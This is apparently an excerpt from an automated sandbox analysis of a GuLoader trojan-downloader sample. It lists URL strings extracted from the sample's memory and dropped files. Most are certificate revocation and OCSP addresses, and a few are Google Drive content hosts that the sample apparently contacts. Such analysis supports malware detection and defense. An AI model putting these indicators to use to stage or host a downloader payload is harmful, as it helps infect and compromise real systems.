Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0B
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0L
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://s2.symcb.com0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://subca.ocsp-certum.com02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://subca.ocsp-certum.com05
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://sv.symcd.com0&
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: ios.exe, 0000001F.00000001.1820408764.0000000000626000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.vmware.com/0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.vmware.com/0/
Source: ios.exe, 0000001F.00000001.1820155163.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: ios.exe, 0000001F.00000001.1820155163.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323184986.000000000197E000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.1992569857.0000000001840000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/
Source: ios.exe, 0000001F.00000003.1992569857.0000000001840000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/#
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/%%doc-0o-68-docs.googleusercontent.com
